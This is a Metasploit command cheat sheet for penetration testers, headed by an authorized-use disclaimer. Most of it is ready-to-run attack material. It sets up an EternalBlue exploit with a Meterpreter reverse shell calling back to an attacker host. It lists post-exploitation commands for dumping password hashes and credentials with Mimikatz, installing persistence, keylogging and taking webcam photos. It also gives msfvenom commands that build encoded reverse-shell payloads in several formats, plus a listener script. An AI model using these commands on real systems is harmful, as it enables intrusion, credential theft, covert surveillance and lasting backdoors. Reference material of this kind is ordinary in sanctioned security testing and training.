METASPLOIT
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
STARTING METASPLOIT#
msfconsole # Start Metasploit console msfconsole -q # Quiet mode (no banner) msfconsole -r script.rc # Run resource script
DATABASE SETUP#
systemctl start postgresql # Start PostgreSQL msfdb init # Initialize database msfdb reinit # Reinitialize database db_status # Check database connection
BASIC COMMANDS#
help # Show help search <term> # Search modules use <module> # Select module info # Show module info show options # Show module options show advanced # Show advanced options set <option> <value> # Set option value setg <option> <value> # Set global option unset <option> # Unset option run / exploit # Execute module back # Exit current module exit / quit # Exit Metasploit
SEARCH COMMANDS#
search type:exploit platform:windows # Filter by type and platform search cve:2021 # Search by CVE year search name:smb # Search by name search author:hdm # Search by author search rank:excellent # Search by rank
WORKSPACE MANAGEMENT#
workspace # List workspaces workspace -a <name> # Add workspace workspace -d <name> # Delete workspace workspace <name> # Switch workspace
HOST & SERVICE MANAGEMENT#
hosts # List hosts hosts -a <ip> # Add host hosts -d <ip> # Delete host services # List services services -p 80 # Filter by port vulns # List vulnerabilities creds # List credentials loot # List loot
EXPLOITATION#
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.5 set LPORT 4444 exploit
COMMON PAYLOADS#
# Windows windows/meterpreter/reverse_tcp windows/x64/meterpreter/reverse_tcp windows/shell/reverse_tcp windows/shell_reverse_tcp # Linux linux/x86/meterpreter/reverse_tcp linux/x64/shell_reverse_tcp # Web php/meterpreter/reverse_tcp java/meterpreter/reverse_tcp
METERPRETER COMMANDS#
# System sysinfo # System information getuid # Current user getpid # Current process ID ps # List processes migrate <pid> # Migrate to process kill <pid> # Kill process execute -f cmd.exe # Execute command shell # Drop to shell background # Background session # File System pwd # Print working directory ls # List files cd <dir> # Change directory cat <file> # Read file download <file> # Download file upload <file> # Upload file edit <file> # Edit file rm <file> # Remove file mkdir <dir> # Create directory rmdir <dir> # Remove directory search -f <pattern> # Search for files # Network ipconfig / ifconfig # Network interfaces route # Routing table portfwd add -l 8080 -p 80 -r <ip> # Port forward arp # ARP table # Privilege Escalation getsystem # Attempt SYSTEM privileges hashdump # Dump password hashes load kiwi # Load Mimikatz extension creds_all # Dump all credentials # Persistence run persistence -h # Persistence options run persistence -U -i 5 -p 4444 -r <ip> # Keylogging keyscan_start # Start keylogger keyscan_dump # Dump captured keys keyscan_stop # Stop keylogger # Screenshot & Camera screenshot # Take screenshot webcam_list # List webcams webcam_snap # Take webcam photo
SESSION MANAGEMENT#
sessions # List sessions sessions -i <id> # Interact with session sessions -k <id> # Kill session sessions -K # Kill all sessions sessions -u <id> # Upgrade to meterpreter
AUXILIARY MODULES#
# Scanning auxiliary/scanner/portscan/tcp auxiliary/scanner/smb/smb_version auxiliary/scanner/ssh/ssh_version auxiliary/scanner/http/http_version # Enumeration auxiliary/scanner/smb/smb_enumshares auxiliary/scanner/smb/smb_enumusers auxiliary/scanner/snmp/snmp_enum # Brute Force auxiliary/scanner/ssh/ssh_login auxiliary/scanner/ftp/ftp_login auxiliary/scanner/smb/smb_login
POST EXPLOITATION#
# Windows post/windows/gather/hashdump post/windows/gather/enum_logged_on_users post/windows/gather/enum_applications post/windows/manage/migrate # Linux post/linux/gather/hashdump post/linux/gather/enum_users_history post/linux/gather/enum_network # Multi-platform post/multi/gather/env post/multi/gather/ssh_creds
MSFVENOM PAYLOADS#
# Windows reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe > shell.exe # Linux reverse shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf > shell.elf # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw > shell.php # ASP reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f asp > shell.asp # JSP reverse shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f raw > shell.jsp # Python reverse shell msfvenom -p cmd/unix/reverse_python LHOST=<ip> LPORT=4444 -f raw # Encoded payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > encoded.exe
RESOURCE SCRIPTS#
# Create script: handler.rc use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 set ExitOnSession false exploit -j # Run script msfconsole -r handler.rc